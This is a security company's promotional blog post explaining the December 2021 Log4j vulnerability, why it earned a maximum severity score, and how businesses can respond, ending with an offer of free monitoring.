On December 9, a major vulnerability was discovered in a popular open source software package that by the next day companies were scrambling to figure out how best to respond.
You only get something as bad as Log4J every 4-5 years. It's real bad.
- Security Engineer at American Cyber
According to the Washington Post and Check Point Software, hackers have already tried to use it to get into nearly half of all corporate networks around the world. The motives are financial, however on Dec. 15, Check Point said Iranian state-backed hackers used the vulnerability to try to break into the Israeli government and business targets.
What is Log4?
Apache Log4j is a Java-based logging application that helps software applications keep track of their past activities. Each time log4j is asked to log something new, it tries to make sense of that entry and add it to the record. A few weeks ago, researchers realized that someone can arbitrarily insert malicious code that can compromise any servers that are using the software.
Why is it so bad?
An attacker who can control log messages or log message parameters can execute code loaded from LDAP servers when message lookup substitution is enabled.
There are three main reasons why this vulnerability has a maximum CVSS severity score of 10.
It's relatively easy to execute - even for amateurs and script kiddies.
The remote code can be inserted pre-authentication. This means that the attacker does not have to sign into internet-facing on-premise and cloud services.
IT and InfoSec teams cannot simply setup gateway blocking rules. There's a lot of methods for obfuscation and evasion.
What should you do?
The majority of all software providers are rapidly working to update their software product code. For example, more than 500 engineers at Google worked day and night reviewing code to make sure this vulnerability did not impact the security of their products.
It is absolutely critical for IT and Information Security teams to monitor inbound and outbound traffic and respond to suspicious alerts generated from their security products.
For those businesses that don't have trained information security professionals that can deploy, configure, manage and monitor these products, they need to partner with a specialized service provider that can detect, protect and respond to suspicious security events.
American Cyber recommends investing in MDR, XDR and Incident Response services to combat ransomware and other cyber actors that are likely to try and exploit this vulnerability.
Partnering with a specialized service provider that has a fully integrated solution delivers positive security and risk mitigation outcomes for your business.
For a limited time only, American Cyber is extending 30 days of free security monitoring to help alert small and medium businesses to cyber attacks that might impact their operations.